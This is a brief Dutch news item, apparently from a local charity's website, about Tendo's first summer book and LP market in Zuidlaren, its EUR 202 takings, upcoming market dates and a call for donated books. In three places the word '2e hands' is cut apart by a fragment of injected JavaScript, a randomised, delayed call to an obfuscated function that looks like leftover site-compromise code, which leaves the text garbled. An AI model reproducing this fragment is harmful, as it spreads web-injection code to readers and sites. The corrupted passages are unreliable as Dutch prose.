Eerste Boekenmarkt van het jaar mooi succes

Woensdag 17 juli jl. vond de 1e boekenmarkt plaats in Zuidlaren waar Tendo haar 2e handandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}s boeken aanbood. Een mooie collectie boeken én voor het eerst ook (2e handandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}s) lp’s stonden uitgestald en vonden gretig aftrek. Met inzet van enkele vrijwilligers werd voor een bedrag van € 202 (netto) aan boeken en lp’s verkocht. Een hele mooie opbrengst. Er volgen nog 3 boekenmarkten deze zomer t.w. 24 en 31 juli en 7 augustus. Ook is het de bedoeling om in september a.s. nog een hele zaterdag ergens in Zuidlaren te gaan staan met boeken en lp’s. We houden u via de site graag op de hoogte van de resultaten. Uw (goede) 2e handandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}s boeken (en lp’s) zijn dan ook nog steeds zeer welkom aangezien dit een structurele activiteit van Tendo is. Belt u met 06-10711651 of 050-4094423 en we komen de boeken halen.